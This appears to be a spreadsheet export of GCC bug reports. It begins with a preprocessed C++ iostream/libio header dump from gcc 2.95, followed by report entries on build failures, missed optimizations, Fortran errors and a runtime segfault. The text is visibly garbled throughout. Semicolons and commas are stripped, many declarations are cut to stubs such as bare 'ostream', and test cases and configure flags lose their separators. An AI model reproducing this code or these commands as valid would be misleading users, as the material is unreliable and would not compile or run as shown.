  __mbstate_t __state	 
  struct __gconv_trans_data *__trans
}
typedef struct __gconv_info
{
  size_t __nsteps
  struct __gconv_step *__steps
  __extension__ struct __gconv_step_data __data [0] 
} *__gconv_t
# 44 /usr/include/_G_config.h 2 3
typedef union
{
  struct __gconv_info __cd
  struct
  {
    struct __gconv_info __cd
    struct __gconv_step_data __data
  } __combined
} _G_iconv_t
typedef int _G_int16_t __attribute__ ((__mode__ (__HI__)))
typedef int _G_int32_t __attribute__ ((__mode__ (__SI__)))
typedef unsigned int _G_uint16_t __attribute__ ((__mode__ (__HI__)))
typedef unsigned int _G_uint32_t __attribute__ ((__mode__ (__SI__)))
# 32 /usr/include/libio.h 2 3
# 1 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stdarg.h 1 3
typedef void *__gnuc_va_list
# 122 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stdarg.h 3
# 209 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stdarg.h 3
# 53 /usr/include/libio.h 2 3
# 72 /usr/include/libio.h 3
# 103 /usr/include/libio.h 3
struct _IO_jump_t  struct _IO_FILE
typedef void _IO_lock_t
struct _IO_marker {
  struct _IO_marker *_next
  struct _IO_FILE *_sbuf
  int _pos
# 192 /usr/include/libio.h 3
}
enum __codecvt_result
{
  __codecvt_ok
  __codecvt_partial
  __codecvt_error
  __codecvt_noconv
}
# 259 /usr/include/libio.h 3
struct _IO_FILE {
  int _flags		 
  char* _IO_read_ptr	 
  char* _IO_read_end	 
  char* _IO_read_base	 
  char* _IO_write_base	 
  char* _IO_write_ptr	 
  char* _IO_write_end	 
  char* _IO_buf_base	 
  char* _IO_buf_end	 
  char *_IO_save_base  
  char *_IO_backup_base   
  char *_IO_save_end  
  struct _IO_marker *_markers
  struct _IO_FILE *_chain
  int _fileno
  int _blksize
  __off_t   _old_offset  
  unsigned short _cur_column
  signed char _vtable_offset
  char _shortbuf[1]
  _IO_lock_t *_lock
  __off64_t   _offset
  void *__pad1
  void *__pad2
  int _mode
  char _unused2[15 * sizeof (int) - 2 * sizeof (void *)]
}
struct _IO_FILE_plus
extern struct _IO_FILE_plus _IO_2_1_stdin_
extern struct _IO_FILE_plus _IO_2_1_stdout_
extern struct _IO_FILE_plus _IO_2_1_stderr_
typedef __ssize_t __io_read_fn (void *__cookie char *__buf size_t __nbytes)
typedef __ssize_t __io_write_fn (void *__cookie __const char *__buf
				 size_t __n)
typedef int __io_seek_fn (void *__cookie __off64_t   *__pos int __w)
typedef int __io_close_fn (void *__cookie)
# 389 /usr/include/libio.h 3
extern C {
extern int __underflow (_IO_FILE *) throw () 
extern int __uflow (_IO_FILE *) throw () 
extern int __overflow (_IO_FILE * int) throw () 
extern wint_t   __wunderflow (_IO_FILE *) throw () 
extern wint_t   __wuflow (_IO_FILE *) throw () 
extern wint_t   __woverflow (_IO_FILE * wint_t  ) throw () 
extern int _IO_getc (_IO_FILE *__fp) throw () 
extern int _IO_putc (int __c _IO_FILE *__fp) throw () 
extern int _IO_feof (_IO_FILE *__fp) throw () 
extern int _IO_ferror (_IO_FILE *__fp) throw () 
extern int _IO_peekc_locked (_IO_FILE *__fp) throw () 
extern void _IO_flockfile (_IO_FILE *) throw () 
extern void _IO_funlockfile (_IO_FILE *) throw () 
extern int _IO_ftrylockfile (_IO_FILE *) throw () 
extern int _IO_vfscanf (_IO_FILE * __restrict const char * __restrict
			__gnuc_va_list  int *__restrict) throw () 
extern int _IO_vfprintf (_IO_FILE *__restrict const char *__restrict
			 __gnuc_va_list ) throw () 
extern __ssize_t   _IO_padn (_IO_FILE * int __ssize_t  ) throw () 
extern size_t   _IO_sgetn (_IO_FILE * void * size_t  ) throw () 
extern __off64_t   _IO_seekoff (_IO_FILE * __off64_t   int int) throw () 
extern __off64_t   _IO_seekpos (_IO_FILE * __off64_t   int) throw () 
extern void _IO_free_backup_area (_IO_FILE *) throw () 
# 511 /usr/include/libio.h 3
}
# 36 /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../include/g++-3/streambuf.h 2 3
}
# 1 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stdarg.h 1 3
void va_end (__gnuc_va_list)		 
# 175 /usr/lib/gcc-lib/i386-linux/2.95.4/include/stdarg.h 3
typedef __gnuc_va_list va_list
# 40 /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../include/g++-3/streambuf.h 2 3
extern C++ {
class istream  
class ostream class streambuf
typedef __off64_t   streamoff
typedef __off64_t   streampos
typedef __ssize_t   streamsize
typedef unsigned long __fmtflags
typedef unsigned char __iostate
struct _ios_fields
{  
    streambuf *_strbuf
    ostream* _tie
    int _width
    __fmtflags _flags
    wchar_t   _fill
    __iostate _state
    __iostate _exceptions
    int _precision
    void *_arrays  
}
# 124 /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../include/g++-3/streambuf.h 3
class ios : public _ios_fields {
  ios   
  ios (const ios  
  public:
    typedef __fmtflags fmtflags
    typedef int iostate
    typedef int openmode
    typedef __ssize_t   streamsize
    enum io_state {
	goodbit = 0 
	eofbit = 1 
	failbit = 2 
	badbit = 4  }
    enum open_mode {
	in = 1 
	out = 2 
	ate = 4 
	app = 8 
	trunc = 16 
	nocreate = 32 
	noreplace = 64 
	bin = 128   
	binary = 128  }
    enum seek_dir { beg cur end}
    typedef enum seek_dir seekdir
    enum { skipws= 01 
	   left= 02  right= 04  internal= 010 
	   dec= 020  oct= 040  hex= 0100 
	   showbase= 0200  showpoint= 0400 
	   uppercase= 01000  showpos= 02000 
	   scientific= 04000  fixed= 010000 
	   unitbuf= 020000  stdio= 040000 
	   }
    enum {  
	basefield=dec+oct+hex
	floatfield = scientific+fixed
	adjustfield = left+right+internal
    }
# 177 /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../include/g++-3/streambuf.h 3
    ostream* tie() const { return _tie }
    ostream* tie(ostream* val) { ostream* save=_tie _tie=val return save }
    wchar_t   fill() const { return _fill }
    wchar_t   fill(wchar_t   newf)
	{wchar_t   oldf = _fill _fill = newf return oldf}
    fmtflags flags() const { return _flags }
    fmtflags flags(fmtflags new_val) {
	fmtflags old_val = _flags _flags = new_val return old_val }
    int precision() const { return _precision }
    int precision(int newp) {
	unsigned short oldp = _precision _precision = (unsigned short)newp
	return oldp }
    fmtflags setf(fmtflags val) {
	fmtflags oldbits = _flags
	_flags |= val return oldbits }
    fmtflags setf(fmtflags val fmtflags mask) {
	fmtflags oldbits = _flags
	_flags = (_flags  return oldbits }
    fmtflags unsetf(fmtflags mask) {
	fmtflags oldbits = _flags
	_flags  return oldbits }
    int width() const { return _width }
    int width(int val) { int save = _width _width = val return save }
    void _throw_failure() const { }
    void clear(iostate state = 0) {
	_state = _strbuf ? state : state|badbit
	if (_state  }
    void set(iostate flag) { _state |= flag
	if (_state  }
    void setstate(iostate flag) { _state |= flag  
	if (_state  }
    int good() const { return _state == 0 }
    int eof() const { return _state  }
    int fail() const { return _state  }
    int bad() const { return _state  }
    iostate rdstate() const { return _state }
    operator void*() const { return fail() ? (void*)0 : (void*)(-1) }
    int operator!() const { return fail() }
    iostate exceptions() const { return _exceptions }
    void exceptions(iostate enable) {
	_exceptions = enable
	if (_state  }
    streambuf* rdbuf() const { return _strbuf }
    streambuf* rdbuf(streambuf *_s) {
      streambuf *_old = _strbuf _strbuf = _s clear () return _old }
    static int sync_with_stdio(int on)
    static void sync_with_stdio() { sync_with_stdio(1) }
    static fmtflags bitalloc()
    static int xalloc()
    void*
    void* pword(int) const
    long
    long iword(int) const
    class Init {
    public:
      Init () { }
    }
  protected:
    inline ios(streambuf* sb = 0 ostream* tie_to = 0)
    inline virtual ~ios()
    inline void init(streambuf* sb ostream* tie = 0)
}
typedef ios::seek_dir _seek_dir
class streammarker : private _IO_marker {
    friend class streambuf
    void set_offset(int offset) { _pos = offset }
  public:
    streammarker(streambuf *sb)
    ~streammarker()
    int saving() { return  1 }
    int delta(streammarker
    int delta()
}
struct streambuf : public _IO_FILE {  
    friend class ios
    friend class istream
    friend class ostream
    friend class streammarker
    const void * }
  protected:
    static streambuf* _list_all  
    _IO_FILE* }
    void _un_link()
    void _link_in()
    char* gptr() const
      { return _flags   }
    char* pptr() const { return _IO_write_ptr }
    char* egptr() const
      { return _flags   }
    char* epptr() const { return _IO_write_end }
    char* pbase() const { return _IO_write_base }
    char* eback() const
      { return _flags  }
    char* base() const { return _IO_buf_base }
    char* ebuf() const { return _IO_buf_end }
    int blen() const { return _IO_buf_end - _IO_buf_base }
    void xput_char(char c) { *_IO_write_ptr++ = c }
    int xflags() { return _flags  }
    int xflags(int f) {int fl = _flags  _flags  = f return fl}
    void xsetflags(int f) { _flags  |= f }
    void xsetflags(int f int mask)
      { _flags  = (_flags   }
    void gbump(int n)
      { _flags  }
    void pbump(int n) { _IO_write_ptr += n }
    void setb(char* b char* eb int a=0)
    void setp(char* p char* ep)
      { _IO_write_base=_IO_write_ptr=p _IO_write_end=ep }
    void setg(char* eb char* g char *eg) {
      if (_flags   
      _IO_read_base = eb _IO_read_ptr = g _IO_read_end = eg }
    char *shortbuf() { return _shortbuf }
    int in_backup() { return _flags  }
    char *Gbase() { return in_backup() ? _IO_save_base : _IO_read_base }
    char *eGptr() { return in_backup() ? _IO_save_end : _IO_read_end }
    char *Bbase() { return in_backup() ? _IO_read_base : _IO_save_base }
    char *Bptr() { return _IO_backup_base }
    char *eBptr() { return in_backup() ? _IO_read_end : _IO_save_end }
    char *Nbase() { return _IO_save_base }
    char *eNptr() { return _IO_save_end }
    int have_backup() { return _IO_save_base != __null  }
    int have_markers() { return _markers != __null  }
    void free_backup_area()
    void unsave_markers()  
    int put_mode() { return _flags  }
    int switch_to_get_mode()
    streambuf(int flags=0)
  public:
    static int flush_all()
    static void flush_all_linebuffered()  
    virtual ~streambuf()
    virtual int overflow(int c = (-1) )  
    virtual int underflow()  
    virtual int uflow()  
    virtual int pbackfail(int c)
    virtual streamsize xsputn(const char* s streamsize n)
    virtual streamsize xsgetn(char* s streamsize n)
    virtual streampos seekoff(streamoff _seek_dir int mode=ios::in|ios::out)
    virtual streampos seekpos(streampos pos int mode = ios::in|ios::out)
    streampos pubseekoff(streamoff o _seek_dir d int mode=ios::in|ios::out)
      { return _IO_seekoff (this o d mode) }
    streampos pubseekpos(streampos pos int mode = ios::in|ios::out)
      { return _IO_seekpos (this pos mode) }
    streampos sseekoff(streamoff _seek_dir int mode=ios::in|ios::out)
    streampos sseekpos(streampos pos int mode = ios::in|ios::out)
    virtual streambuf* setbuf(char* p int len)
    virtual int sync()
    virtual int doallocate()
    int seekmark(streammarker
    int sputbackc(char c)
    int sungetc()
    int unbuffered() { return _flags  }
    int linebuffered() { return _flags  }
    void unbuffered(int i)
	{ if (i) _flags |= 2  else _flags  }
    void linebuffered(int i)
	{ if (i) _flags |= 0x200  else _flags  }
    int allocate() {  
	if (base() || unbuffered()) return 0
	else return doallocate() }
    void allocbuf() { if (base() == __null ) doallocbuf() }
    void doallocbuf()
    int in_avail() { return _IO_read_end - _IO_read_ptr }
    int out_waiting() { return _IO_write_ptr - _IO_write_base }
    streamsize sputn(const char* s streamsize n) { return xsputn(s n) }
    streamsize padn(char pad streamsize n) { return _IO_padn(this pad n) }
    streamsize sgetn(char* s streamsize n) { return _IO_sgetn(this s n) }
    int ignore(int)
    int get_column()
    int set_column(int)
    long sgetline(char* buf size_t   n char delim int putback_delim)
    int sputc(int c) { return _IO_putc(c this) }
    int sbumpc() { return _IO_getc(this) }
    int sgetc() { return ((  this  )-&gt;_IO_read_ptr &gt;= (  this  )-&gt;_IO_read_end  }
    int snextc() {
	if (_IO_read_ptr &gt;= _IO_read_end &amp;&amp; __underflow(this) == (-1) )
	  return (-1) 
	else return _IO_read_ptr++ sgetc() }
    void stossc() { if (_IO_read_ptr &lt; _IO_read_end) _IO_read_ptr++ }
    int vscan(char const *fmt0 __gnuc_va_list  ap ios* stream = __null )
    int scan(char const *fmt0 ...)
    int vform(char const *fmt0 __gnuc_va_list  ap)
    int form(char const *fmt0 ...)
    virtual streamsize sys_read(char* buf streamsize size)
    virtual streamsize sys_write(const char* streamsize)
    virtual streampos sys_seek(streamoff _seek_dir)
    virtual int sys_close()
    virtual int sys_stat(void*)  
    virtual int showmanyc()
    virtual void imbue(void *)
}
class filebuf : public streambuf {
  protected:
    void init()
  public:
    static const int openprot  
    filebuf()
    filebuf(int fd)
    filebuf(int fd char* p int len)
    ~filebuf()
    filebuf* attach(int fd)
    filebuf* open(const char *filename const char *mode)
    filebuf* open(const char *filename ios::openmode mode int prot = 0664)
    virtual int underflow()
    virtual int overflow(int c = (-1) )
    int is_open() const { return _fileno &gt;= 0 }
    int fd() const { return is_open() ? _fileno : (-1)  }
    filebuf* close()
    virtual int doallocate()
    virtual streampos seekoff(streamoff _seek_dir int mode=ios::in|ios::out)
    virtual streambuf* setbuf(char* p int len)
    streamsize xsputn(const char* s streamsize n)
    streamsize xsgetn(char* s streamsize n)
    virtual int sync()
  protected:  
    int is_reading() { return eback() != egptr() }
    char* cur_ptr() { return is_reading() ?  gptr() : pptr() }
    char* file_ptr() { return eGptr() }
    virtual streamsize sys_read(char* buf streamsize size)
    virtual streampos sys_seek(streamoff _seek_dir)
    virtual streamsize sys_write(const char* streamsize)
    virtual int sys_stat(void*)  
    virtual int sys_close()
}
inline void ios::init(streambuf* sb ostream* tie_to) {
		_state = sb ? ios::goodbit : ios::badbit _exceptions=0
		_strbuf=sb _tie = tie_to _width=0 _fill=' '
		_flags=ios::skipws|ios::dec
		_precision=6 _arrays = 0 }
inline ios::ios(streambuf* sb ostream* tie_to) { init(sb tie_to) }
inline ios::~ios() {
    operator delete[] (_arrays)
}
}  
# 31 /usr/lib/gcc-lib/i386-linux/2.95.4/../../../../include/g++-3/iostream.h 2 3
extern C++ {
class istream class ostream
typedef ios
typedef istream
typedef ostream
extern istream
extern ostream
extern ostream
extern ostream
class ostream : virtual public ios
{
    void do_osfx()
  public:
    ostream() { }
    ostream(streambuf* sb ostream* tied= __null )
    int opfx() {
	if (!good()) return 0
	else { if (_tie) _tie-&gt;flush()   return 1} }
    void osfx() {  
		  if (flags() &amp; (ios::unitbuf|ios::stdio))
		      do_osfx() }
    ostream
    ostream return *this }
    ostream
    ostream&amp; write(const unsigned char *s streamsize n)
      { return write((const char*)s n)}
    ostream&amp; write(const signed char *s streamsize n)
      { return write((const char*)s n)}
    ostream&amp; write(const void *s streamsize n)
      { return write((const char*)s n)}
    ostream
    ostream
    streampos tellp()
    ostream
    ostream
    ostream
    ostream }
    ostream }
    ostream
    ostream&amp; operator&lt;&lt;(const unsigned char *s)
	{ return (*this) &lt;&lt; (const char*)s }
    ostream&amp; operator&lt;&lt;(const signed char *s)
	{ return (*this) &lt;&lt; (const char*)s }
    ostream
    ostream
    ostream
    ostream
    ostream
    __extension__ ostream
    __extension__ ostream
    ostream}
    ostream}
    ostream }
    ostream
    ostream }
    ostream
    ostream }
    ostream return *this}
    ostream
}
class istream : virtual public ios
{
protected:
    size_t   _gcount
    int _skip_ws()
  public:
    istream(): _gcount (0) { }
    istream(streambuf* sb ostream*tied= __null )
    istream
    istream&amp; get(unsigned char* ptr int len char delim = '\n')
	{ return get((char*)ptr len delim) }
    istream
    istream }
    istream
    istream&amp; getline(unsigned char* ptr int len char delim = '\n')
	{ return getline((char*)ptr len delim) }
    istream }
    istream&amp; get(signed char* ptr int len char delim = '\n')
	{ return get((char*)ptr len delim) }
    istream&amp; getline(signed char* ptr int len char delim = '\n')
	{ return getline((char*)ptr len delim) }
    istream
    istream&amp; read(unsigned char *ptr streamsize n)
      { return read((char*)ptr n) }
    istream&amp; read(signed char *ptr streamsize n)
      { return read((char*)ptr n) }
    istream&amp; read(void *ptr streamsize n)
      { return read((char*)ptr n) }
    istream
    istream
    int ipfx(int need = 0) {
	if (!good()) { set(ios::failbit) return 0 }
	else {
	  if (_tie 
	  if (!need 
	  else return 1
	}
    }
    int ipfx0() {  
	if (!good()) { set(ios::failbit) return 0 }
	else {
	  if (_tie) _tie-&gt;flush()
	  if (flags() 
	  else return 1
	}
    }
    int ipfx1() {  
	if (!good()) { set(ios::failbit) return 0 }
	else {
	  if (_tie 
	  return 1
	}
    }
    void isfx() {   }
    int get() { if (!ipfx1()) return (-1) 
		else { int ch = _strbuf-&gt;sbumpc()
		       if (ch == (-1) ) set(ios::eofbit)
		       isfx()
		       return ch
		     } }
    int peek()
    size_t   gcount() { return _gcount }
    istream
    int sync ()
    istream
    istream
    streampos tellg()
    istream&amp; putback(char ch) {
	if (good() 
	return *this}
    istream&amp; unget() {
	if (good() 
	return *this}
    istream
    istream
    istream
    istream }
    istream }
    istream
    istream}
    istream}
    istream
    istream
    __extension__ istream
    __extension__ istream
    istream
    istream
    istream
    istream
    istream
    istream
    istream
    istream
    istream return *this}
    istream }
    istream
}
class iostream : public istream public ostream
{
  public:
    iostream() { }
    iostream(streambuf* sb ostream*tied= __null )
}
class _IO_istream_withassign : public istream {
public:
  _IO_istream_withassign
  _IO_istream_withassign&amp; operator=(_IO_istream_withassign&amp; rhs)
    { return operator= (static_cast&lt;istream }
}
class _IO_ostream_withassign : public ostream {
public:
  _IO_ostream_withassign
  _IO_ostream_withassign&amp; operator=(_IO_ostream_withassign&amp; rhs)
    { return operator= (static_cast&lt;ostream }
}
extern _IO_istream_withassign cin
extern _IO_ostream_withassign cout cerr
extern _IO_ostream_withassign clog
extern istream
extern istream
extern ostream
extern ostream
struct Iostream_init { }    
inline ios&amp; dec(ios&amp; i)
{ i.setf(ios::dec ios::dec|ios::hex|ios::oct) return i </t>
  </si>
  <si>
    <t>delassus</t>
  </si>
  <si>
    <t>GCC-14095</t>
  </si>
  <si>
    <t>[4.0 Regression] sh-elf build failure in libgcc2</t>
  </si>
  <si>
    <t>I get the following error with latest cvs sources
/home/mnt/rakeshku/cvs/objs/gcc/xgcc -B/home/mnt/rakeshku/cvs/objs/gcc/ -
B/home/mnt/rakeshku/cvs/install/sh-elf/bin/ -B/home/mnt/rakeshku/cvs/install/sh-
elf/lib/ -isystem /home/mnt/rakeshku/cvs/install/sh-elf/include -
isystem /home/mnt/rakeshku/cvs/install/sh-elf/sys-include -O2  -DIN_GCC -
DCROSS_COMPILE   -W -Wall -Wwrite-strings -Wstrict-prototypes -Wmissing-
prototypes -Wold-style-definition  -isystem ./include   -g  -DIN_LIBGCC2 -
D__GCC_FLOAT_NOT_NEEDED  -I. -I -I/home/mnt/rakeshku/cvs/gcc/gcc -
I/home/mnt/rakeshku/cvs/gcc/gcc/ -I/home/mnt/rakeshku/cvs/gcc/gcc/../include   -
DL_muldi3 -c /home/mnt/rakeshku/cvs/gcc/gcc/libgcc2.c -o libgcc/./_muldi3.o
/tmp/ccqEKzrt.s: Assembler messages:
/tmp/ccqEKzrt.s:280: Error: can't resolve `.text' {.text section} - `_.text' 
{*UND* section}
/tmp/ccqEKzrt.s:281: Error: can't resolve `.text' {.text section} - `_.text' 
{*UND* section}
/tmp/ccqEKzrt.s:289: Error: can't resolve `.text' {.text section} - `_.text' 
{*UND* section}
/tmp/ccqEKzrt.s:290: Error: can't resolve `.text' {.text section} - `_.text' 
{*UND* section}
/tmp/ccqEKzrt.s:298: Error: can't resolve `.text' {.text section} - `_.text' 
{*UND* section}
/tmp/ccqEKzrt.s:299: Error: can't resolve `.text' {.text section} - `_.text' 
{*UND* section}
/tmp/ccqEKzrt.s:312: Error: can't resolve `.text' {.text section} - `_.text' 
{*UND* section}
If LIBGCC2_DEBUG_CFLAGS is set to NULL GCC installs itself successfully.
Here is the version information:
/home/mnt/rakeshku/cvs/gcc/configure --target=sh-elf --
prefix=/home/mnt/rakeshku/cvs/install --with-as=/home/gnu/local/bin/sh-elf-as --
with-ld=/home/gnu/local/bin/sh-elf-ld --with-libs=/home/gnu/local/sh-elf/lib --
enable-languages=c --with-headers=/home/gnu/local/sh-elf/include --enable-
checking=rtl
Thread model: single
gcc version 3.5.0 20040210 (experimental)</t>
  </si>
  <si>
    <t>rakeshku</t>
  </si>
  <si>
    <t>GCC-29978</t>
  </si>
  <si>
    <t>[4.2 Regression] redundant jumps</t>
  </si>
  <si>
    <t>With following testcase gcc 4.1.1 with -Os produces two back-to-back jumps:
jump to L2 if less jump to L2 if less-or-equal the first one is not needed.
-O2 is worse but I usually use -Os anyway.
void g()
void f(long long v) {
        if (v &gt; 0777777777777LL)
                g()
        g()
}
/* gcc -v:
Target: i386-pc-linux-gnu
 [skip]
Thread model: posix
gcc version 4.1.1
================
gcc -Os -fomit-frame-pointer -S tar.c
f:
        cmpl    $15 8(%esp)
        jl      .L2     // not needed
        jle     .L2
        call    g
.L2:
        jmp     g
================
gcc -O2 -fomit-frame-pointer -S tar.c
f:
        subl    $12 %esp       // not needed
        cmpl    $15 20(%esp)
        jl      .L2     // not needed
        jle     .L2
        call    g
        .p2align 23
.L2:
        addl    $12 %esp       // not needed
        jmp     g
*/</t>
  </si>
  <si>
    <t>GCC-19090</t>
  </si>
  <si>
    <t>Non-useful warnings included in -Wall</t>
  </si>
  <si>
    <t>Warning about passing a signed int to a function that expects an unsigned int
or vice-versa does not seem like a useful warning to me.  On a Linux kernel build
% zgrep -c 'differ in signedness' 2.6.10rc2-gcc4-warnings.gz 
6809
This is quite high and drowns out many warnings that are more useful.
My understanding is that these warnings only turn into actual bugs on machines
that don't use 2's complement and I'm not aware of a gcc port to any 1's
complement or sign-magnitude machines.  So could this warning be moved to -W please?</t>
  </si>
  <si>
    <t>willy</t>
  </si>
  <si>
    <t>GCC-82460</t>
  </si>
  <si>
    <t>AVX512: choose between vpermi2d and vpermt2d to save mov instructions.  Also fails to optimize away shifts before shuffle</t>
  </si>
  <si>
    <t>#include 
// gcc  -O3 -march=skylake-avx512 -mavx512vbmi    8.0.0 20171004
// https://godbolt.org/g/fVt4Kb
__m512i vpermi2d(__m512i t1 __m512i control char *src) {
  return _mm512_permutex2var_epi32(control t1 _mm512_loadu_si512(src))
}
        vpermt2d        (%rdi) %zmm0 %zmm1
        vmovdqa64       %zmm1 %zmm0
        ret
  clang emits  vpermi2d  (%rdi) %zmm1 %zmm0
__m512i vpermi2b(__m512i t1 __m512i a __m512i b) {
  return _mm512_permutex2var_epi8(a t1 b)
}
        vpermt2b        %zmm2 %zmm0 %zmm1
        vmovdqa64       %zmm1 %zmm0
        ret
  clang emits  vpermi2b  %zmm2 %zmm1 %zmm0
This one compiles ok though:
__m512i vpermt2d(__m512i t1 __m512i control char *src) {
  return _mm512_permutex2var_epi32(t1 control _mm512_loadu_si512(src))
}
        vpermt2d        (%rdi) %zmm1 %zmm0
---
But when auto-vectorizing this with AVX512VBMI (see bug 82459 for AVX512BW missed optimizations) gcc uses vpermi2b when vpermt2b would be better:
void pack_high8_baseline(uint8_t *__restrict__ dst const uint16_t *__restrict__ src size_t bytes) {
  uint8_t *end_dst = dst + bytes
  do{
     *dst++ = *src++ &gt;&gt; 8
  } while(dst &lt; end_dst)
}
.L9:
        vmovdqa64       (%rsi%rax2) %zmm0
        vmovdqa64       64(%rsi%rax2) %zmm1
        vmovdqa64       %zmm2 %zmm3             # copy the index
        vpsrlw  $8 %zmm0 %zmm0
        vpsrlw  $8 %zmm1 %zmm1
        vpermi2b        %zmm1 %zmm0 %zmm3      # then destroy it
        vmovdqu8        %zmm3 (%rcx%rax)       # extra uop according to Intel: bug 82459
        addq    $64 %rax
        cmpq    %rax %rdi
        jne     .L9
Of course the shifts are redundant when we have a full byte shuffle that doesn't do any saturating:
        # different shuffle control in zmm1
   .L9
        vmovdqa64       (%rsi%rax2) %zmm0
        vpermt2b        64(%rsi%rax2) %zmm1 %zmm0
        vmovdqu64        %zmm0 (%rcx%rax)
        addq    $64 %rax
        cmpq    %rax %rdi
        jne     .L9
If unrolling use pointer increments so the shuffle can maybe avoid un-lamination although some multi-uop instructions don't micro-fuse in the first place.
vpermt2w is 3 uops on Skylake-AVX512 (p0 + 2p5) so we should expect vpermt2b to be at least that slow on the first CPUs that support it.  On a CPU where vpermt2b is p0 + 2p5 this loop will run at about one store per 2 clocks the same as what you can achieve with 2x shift + vpackuswb + vpermq (bug 82459).  But this has one fewer p0 uop.
With indexing from the end of the arrays to save the CMP this could also be 7 fused-domain uops for the front-end (assuming no micro-fusion for the vpermt2b + load) but assuming the store does fuse.</t>
  </si>
  <si>
    <t>GCC-50570</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] Incorrect error for assignment to intent(in) pointer</t>
  </si>
  <si>
    <t>&gt; cat test.f90
program bots_sparselu_pointer_intent_in
! derived from Fortran trans of BOTS sparselu
  implicit none
  integer pointer :: array(:)
  allocate(array(4))
  array = 0
  call sub(array)
  write (**) SUM(array)
contains
  subroutine sub(dummy)
     integer pointer intent(in) :: dummy(:)
     dummy(1) = 1 ! note that gfortran 4.6.1 accepts dummy = 1
  end subroutine sub
end program bots_sparselu_pointer_intent_in
&gt; gfortran -c test.f90
test.f90:16.5:
     dummy(1) = 1 ! note that gfortran 4.6.1 accepts dummy = 1
     1
Error: Dummy argument 'dummy' with INTENT(IN) in variable definition context (assignment) at (1)
This should compile.  In the case of a POINTER dummy the INTENT(IN) applies to the pointer association status not definition of the target.
Appears to be a regression as 4.5.3 was OK.</t>
  </si>
  <si>
    <t>GCC-19314</t>
  </si>
  <si>
    <t>inquire(position=) segfaults at runtime</t>
  </si>
  <si>
    <t>Because of the segfault I assume that this is different from PR 19313.
$ cat inquire-position.f
      character*20 chr
      open(7)
      inquire(7position=chr)
      print *chr
      end
$ gfortran inquire-position.f
$ ./a.out
Segmentation fault
$ gfortran -v  gfortran -dumpmachine
Using built-in specs.
Configured with: ../gcc-4.0-20050102/configure --prefix=/home/zfkts
--enable-languages=cc++f95
Thread model: posix
gcc version 4.0.0 20050102 (experimental)
ia64-unknown-linux-gnu
$ gfortran -g inquire-position.f
$ gdb ./a.out
GNU gdb Red Hat Linux (6.1post-1.20040607.52rh)
Copyright 2004 Free Software Foundation Inc.
GDB is free software covered by the GNU General Public License and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type show copying to see the conditions.
There is absolutely no warranty for GDB.  Type show warranty for details.
This GDB was configured as ia64-redhat-linux-gnu...Using host libthread_db
library /lib/tls/libthread_db.so.1.
(gdb) r
Starting program: /home/zfkts/Krempel/a.out
Program received signal SIGSEGV Segmentation fault.
0x20000000002cee11 in strlen () from /lib/tls/libc.so.6.1
(gdb) bt
#0  0x20000000002cee11 in strlen () from /lib/tls/libc.so.6.1
#1  0x2000000000052470 in *_gfortrani_cf_strcpy (dest=0x0 dest_len=0 src=0x0)
    at ../../../gcc-4.0-20050102/libgfortran/runtime/string.c:84
#2  0x20000000000a3890 in inquire_via_unit (u=0x600000000000a2e0)
    at ../../../gcc-4.0-20050102/libgfortran/io/inquire.c:166
#3  0x20000000000a48a0 in *_gfortran_st_inquire ()
    at ../../../gcc-4.0-20050102/libgfortran/io/inquire.c:370
#4  0x4000000000000cb0 in MAIN__ () at inquire-position.f:3
#5  0x4000000000000df0 in main (argc=1 argv=0x60000fffffffa108)
    at ../../../gcc-4.0-20050102/libgfortran/fmain.c:18
(gdb)</t>
  </si>
  <si>
    <t>GCC-18874</t>
  </si>
  <si>
    <t>? in namelist read leads to I/O recursion</t>
  </si>
  <si>
    <t>Typing ? for a namelist input is supposed to
yield a description of the input variables on
standard output.  This doesn't work with g77:
$ g77 -v
Reading specs from /usr/lib/gcc-lib/ia64-redhat-linux/3.2.3/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man
--infodir=/usr/share/info --enable-shared --enable-threads=posix
--disable-checking --with-system-zlib --enable-__cxa_atexit --host=ia64-redhat-linux
Thread model: posix
gcc version 3.2.3 20030502 (Red Hat Linux 3.2.3-42)
$ ./a.out
$ cat nl.f
      program main
      namelist /nl/ a
      read (*nl)
      print *a
      end
$ g77 nl.f &amp;&amp; a.out
?
I/O recursion: I/O started while already doing I/O
apparent state: unit 5 (unnamed)
last format: list io
lately reading direct formatted external IO
Aborted</t>
  </si>
  <si>
    <t>GCC-24278</t>
  </si>
  <si>
    <t>[3.4 regression] ICE while trying to print out error</t>
  </si>
  <si>
    <t>GCC-21992</t>
  </si>
  <si>
    <t>[4.1 regression] [unit-at-a-time] testsuite failure: many objc execution tests fail first objc/execute/_cmd.m execution</t>
  </si>
  <si>
    <t>With LAST_UPDATED: Thu Jun  9 21:38:48 UTC 2005 I get:
FAIL: objc/execute/_cmd.m execution  -O0
FAIL: objc/execute/_cmd.m execution  -O1
FAIL: objc/execute/_cmd.m execution  -O2
FAIL: objc/execute/_cmd.m execution  -O3 -fomit-frame-pointer
FAIL: objc/execute/_cmd.m execution  -O3 -g
FAIL: objc/execute/_cmd.m execution  -Os
FAIL: objc/execute/accessing_ivars.m execution  -O2
FAIL: objc/execute/accessing_ivars.m execution  -O3 -fomit-frame-pointer
FAIL: objc/execute/accessing_ivars.m execution  -O3 -g
FAIL: objc/execute/accessing_ivars.m execution  -Os
FAIL: objc/execute/bycopy-2.m execution  -O2
FAIL: objc/execute/bycopy-2.m execution  -O3 -fomit-frame-pointer
FAIL: objc/execute/bycopy-2.m execution  -O3 -g
FAIL: objc/execute/bycopy-2.m execution  -Os
FAIL: objc/execute/bycopy-3.m execution  -O2
FAIL: objc/execute/bycopy-3.m execution  -O3 -fomit-frame-pointer
FAIL: objc/execute/bycopy-3.m execution  -O3 -g
FAIL: objc/execute/bycopy-3.m execution  -Os
FAIL: objc/execute/cascading-1.m execution  -O2
FAIL: objc/execute/cascading-1.m execution  -O3 -fomit-frame-pointer
FAIL: objc/execute/cascading-1.m execution  -O3 -g
FAIL: objc/execute/cascading-1.m execution  -Os
FAIL: objc/execute/class-1.m execution  -O2
